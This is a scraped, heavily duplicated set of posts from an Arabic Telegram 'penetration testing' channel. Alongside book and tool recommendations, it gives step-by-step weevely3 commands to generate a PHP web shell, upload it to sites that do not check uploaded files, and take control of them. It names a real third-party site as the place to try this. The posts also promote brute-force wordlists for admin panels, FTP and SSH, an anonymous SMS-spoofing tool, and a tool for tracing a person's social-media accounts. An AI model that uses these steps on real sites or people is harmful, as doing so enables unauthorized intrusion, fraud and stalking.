ERROR 404 BULLET MHS
@Penetration_TestingAr.pdf
✅ - كتاب يتحدث عن UX باللغه العربيه وعدد صفحاته 150 صفحه تقريبا
⭕️ - موقع Hacker Target :
🔒 - هذا الموقع يفيدك في اختبار اختراق تطبيقات الويب بشتى انواعها مهما كانت Wordprees او Jommla ايضا هو يستخدم ادوات مثل Nmap و Zmap و Nikto ويعطيك النتائج بسرعه فائقه يمكنكم تجربة مزاياه عبر الرابط التالي :
📎 - hackertarget.com
🎲 - للمزيد إنضم إلينا هنا :
@Penetration_TestingAr
بالتوفيق 🌹
🔒 - هذا الموقع يفيدك في اختبار اختراق تطبيقات الويب بشتى انواعها مهما كانت Wordprees او Jommla ايضا هو يستخدم ادوات مثل Nmap و Zmap و Nikto ويعطيك النتائج بسرعه فائقه يمكنكم تجربة مزاياه عبر الرابط التالي :
📎 - hackertarget.com
🎲 - للمزيد إنضم إلينا هنا :
@Penetration_TestingAr
بالتوفيق 🌹
🔬 - أداة UserRecon :
🔍 - هي أداة مفيده في جمع المعلومات عن شخص معين في اكثر من 70 من مواقع التواصل الاجتماعي وتتفقد اذا كان ذلك الشخص يستخدمها ام لا وايضا هي مفتوحة المصدر مبرمجه بلغة Bash رابط الاداه :
🔒 - https://github.com/X-HACKRAWI/UserRecon
⭕️ - مطور الاداه :
@Hackrawi
🔍 - هي أداة مفيده في جمع المعلومات عن شخص معين في اكثر من 70 من مواقع التواصل الاجتماعي وتتفقد اذا كان ذلك الشخص يستخدمها ام لا وايضا هي مفتوحة المصدر مبرمجه بلغة Bash رابط الاداه :
🔒 - https://github.com/X-HACKRAWI/UserRecon
⭕️ - مطور الاداه :
@Hackrawi
GitHub
GitHub - X-HACKRAWI/UserRecon
Contribute to X-HACKRAWI/UserRecon development by creating an account on GitHub.
ERROR 404 BULLET MHS
@Penetration_TestingAr Linux.pdf
🔒 - كتاب [ الإدارة المتقدمة لنظام لينكس ] هذا الكتاب من اقوى الكتب التي اقراها حالياً واقوى كتاب رايته عن إدارة النظام احببت مشاركتكم به
📄 - عدد الصفحات : 614
⚙ - اللغة : العربيه هو مترجم من إحدى الكتب الانجليزيه بترجمه ممتازه جداً
🎲 - للمزيد إنضم هنا :
@Penetration_TestingAr
📄 - عدد الصفحات : 614
⚙ - اللغة : العربيه هو مترجم من إحدى الكتب الانجليزيه بترجمه ممتازه جداً
🎲 - للمزيد إنضم هنا :
@Penetration_TestingAr
✅ - Tine eye :
موقع يستخدمه خبراء البحث الجنائي والصفحات الباحثه عن حقيقة مصدر الصوره او الفيديو بالبحث عن مصدره الاصلي وبدون تصديق اي اشاعه :
🎲 - tineye.com
موقع يستخدمه خبراء البحث الجنائي والصفحات الباحثه عن حقيقة مصدر الصوره او الفيديو بالبحث عن مصدره الاصلي وبدون تصديق اي اشاعه :
🎲 - tineye.com
Forwarded from Obaida Ismail | عبيده اسماعيل
Wireshark-Cheat-Sheet.pdf
1.6 MB
ERROR 404 BULLET MHS
Wireshark-Cheat-Sheet.pdf
🎲 - ملف PDF يشرح اداة Wiresharck باللغة الانجليزيه
⛓ - أداة FreeSms :
أداة مفتوحة المصدر مطورة بلغة python يمكنكم من خلالها إرسال رسائل إلى الرقم الذي تريدونه وبالنص الذي تريدوه وبكل سهوله !
🛠 - الاوامر :
$ git clone https://github.com/X-HACKRAWI/FreeSms
$ cd FreeSms
$ python fakesms.py
قم بإدخال الرقم الذي تريده مع مفتاح الدوله بهذا الشكل :
967771651321
ثم ادخل النص الذي تريده !
ستصل بإسم Info فقط !
🛡 - مطور الأداة :
@HackRawi
أداة مفتوحة المصدر مطورة بلغة python يمكنكم من خلالها إرسال رسائل إلى الرقم الذي تريدونه وبالنص الذي تريدوه وبكل سهوله !
🛠 - الاوامر :
$ git clone https://github.com/X-HACKRAWI/FreeSms
$ cd FreeSms
$ python fakesms.py
قم بإدخال الرقم الذي تريده مع مفتاح الدوله بهذا الشكل :
967771651321
ثم ادخل النص الذي تريده !
ستصل بإسم Info فقط !
🛡 - مطور الأداة :
@HackRawi
GitHub
GitHub - X-HACKRAWI/FreeSms: sms anonymous & free
sms anonymous & free . Contribute to X-HACKRAWI/FreeSms development by creating an account on GitHub.
ERROR 404 BULLET MHS
@Penetration_TestingAr.apk
🎲 - تطبيق Linux Commands:
🌐 - تطبيق يستعرض لك " جل " هذا إن لم يكن "كل" الاوامر المخصصه لـ Linux كما انه مقسم إلى عدة اقسام ومنها
قسم للتحكم بالنظام وقسم للمستخدمين والمجموعات وقسم للشبكات وقسم للبحث وقسم لادوات اختبار الاختراق وغيرها من الاقسام
كما انه يعلمك اسرار ممتعه في لينكس مثل !! و * و ?
اتمنى ان ينال اعجابكم
🌐 - تطبيق يستعرض لك " جل " هذا إن لم يكن "كل" الاوامر المخصصه لـ Linux كما انه مقسم إلى عدة اقسام ومنها
قسم للتحكم بالنظام وقسم للمستخدمين والمجموعات وقسم للشبكات وقسم للبحث وقسم لادوات اختبار الاختراق وغيرها من الاقسام
كما انه يعلمك اسرار ممتعه في لينكس مثل !! و * و ?
اتمنى ان ينال اعجابكم
🎲 - من افضل الملفات التي قد تراها من اجل التخمين على لوحات الادمن في المواقع مثل Cpanel او WordPress وغيرها
🔧 - او بعض البروتوكولات مثل FTP و SSH
🗂 - فهو يحتوي على اكثر من 40 ملف كل ملف خاص بشيء معين واستخدامها سهل جدا !
كلمة السر الخاصه بالملف :
🔐 - BULLETMHS
⭕️ - الملف ماخوذ من Github رايته رائع فشاركته معكم 🦦
للمزيد إنضم إلينا على التيليجرام عبر الرابط التالي :
- https://www.tgoop.com/Penetration_TestingAr
🔧 - او بعض البروتوكولات مثل FTP و SSH
🗂 - فهو يحتوي على اكثر من 40 ملف كل ملف خاص بشيء معين واستخدامها سهل جدا !
كلمة السر الخاصه بالملف :
🔐 - BULLETMHS
⭕️ - الملف ماخوذ من Github رايته رائع فشاركته معكم 🦦
للمزيد إنضم إلينا على التيليجرام عبر الرابط التالي :
- https://www.tgoop.com/Penetration_TestingAr
Telegram
ERROR 404 BULLET MHS
Admin : @wahtis
القناة متوقفة حاليًا .
سبحان الله وبحمده , سبحان الله العظيم
القناة متوقفة حاليًا .
سبحان الله وبحمده , سبحان الله العظيم
🎲 - اداة weevely :
⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع
[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.
[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]
bullet@mhs:~# git clone https://github.com/epinna/weevely3
🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/
🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py
ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي
📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة
bullet@mhs:~# pip install -r requirements.txt
💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !
نقوم بكتابة :
bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php
مالذي مكتوب في الاعلى ?
اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي
bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !
ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php
الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات
يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :
www.codesoft.sd
الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :
ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs
بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?
بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>
يمكنك كتابة help لاستعراض الاوامر
🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات
🔓 - للمزيد انضم على قناتنا :
⚙ - https://www.tgoop.com/Penetration_TestingAr
⭕️ - اداة مخصصة لاختبار اختراق المواقع فهي تقوم برفع Shell على الموقع والتحكم به وكما انها سهلة الاستخدام سنقوم بشرحها عملياً على احد المواقع من انشاء ملف Shell حتى التحكم بالموقع
[+] - كما ان الاداة تسمح لنا بجلب قواعد بيانات Sql ورفع ملفات او سحب ملفات وغيرها.
[-] - اولاً يمكنكم تحميل الاداة بهذه الطريقه فقط قم بكتابة ما بعد [ # ]
bullet@mhs:~# git clone https://github.com/epinna/weevely3
🖱 - بعد ان قمنا بتحميلها نقوم بالدخول إلى ملف الاداة
bullet@mhs:~# cd weevely3/
🗜 - سنرى العديد من الملفات ما يهمنا هو ملفين فقط وهم
1- requirements.txt
2- weevely.py
ويمكنك قراءه ال Reademe ايضا لا احد سيقوم بمنعك يا عزيزي
📡 - الملف الاول فيه اسماء المكاتب التي قد تكون غير مثبته على النظام الذي تستخدمه ولكي لا تواجهك اي مشاكل فقط قم بكتابة
bullet@mhs:~# pip install -r requirements.txt
💡- الان حان وقت انشاء الملف الخبيث او الجيد من نضرك !
نقوم بكتابة :
bullet@mhs:~# python weevely.py generate bullet#123|mhs $HOME/mhs.php
مالذي مكتوب في الاعلى ?
اولا قمنا بتشغيل الاداه عبر python وبعدها ملف الاداة ثم قمت باستخدام الخيار
generate
وهو احد الخيارات في الاداة للانشاء ثم بعدها قمت بعمل كلمة سر الا وهي
bullet#123|mhs
ما فائده كلمة السر ?
وكيف استخدمها ?
لا تستعجل ساخبرك حينما نصل يا عزيزي !
ثم بعدها قمت باختيار المسار الذي سينحفظ فيه الملف وهو
$HOME/mhs.php
الان نقوم برفع الملف على بعض المواقع التي لا تقوم بالتحقق من محتوى الملفات
يمكنك التجربه على هذا الموقع والذي سارفق صور بالاسفل توضح بعض المفاهيم في الشرح :
www.codesoft.sd
الان وبعد ان قمنا بتجهيز الملف ورفعه نقوم بجلب مسار الملف بعد ان تم رفعه وهناك العديد من الطرق اولا اما الموقع بنفسه سيقوم باظهار المسار او قم بالدخول إلى ملف Uploads الذي قد يعتبره المطور لا ضرر باضهاره وانت قم بالبحث عن اسم ملفك بينهم
وبعد ان تقوم بجلب المسار مع اسم الموقع نقوم بفتح التيرمنال وكتابة :
ِbullet@mhs:~# python weevely.py www.codesoft.sd/mhs.php bullet#123|mhs
بعد ان قمنا بتشغيل الاداه قمنا بنفس السطر بعمل المسار الذي يتواجد فيه الملف الخاص بنا ثم مسافة ثم كلمة السر الخاصه بنا فتخيل اذا كان بدون كلمة سر هل من الجيد ان ياتي شخص اخر ويقوم بسرقة مجهودك ?
بعدها سيقوم بفتح جلسة مع الموقع مع اظهار
weevely>
يمكنك كتابة help لاستعراض الاوامر
🎲 - إذا كنت ترى خطا مني او بشيء ناقص قم بكتابته في التعليقات
🔓 - للمزيد انضم على قناتنا :
⚙ - https://www.tgoop.com/Penetration_TestingAr
GitHub
GitHub - epinna/weevely3: Weaponized web shell
Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.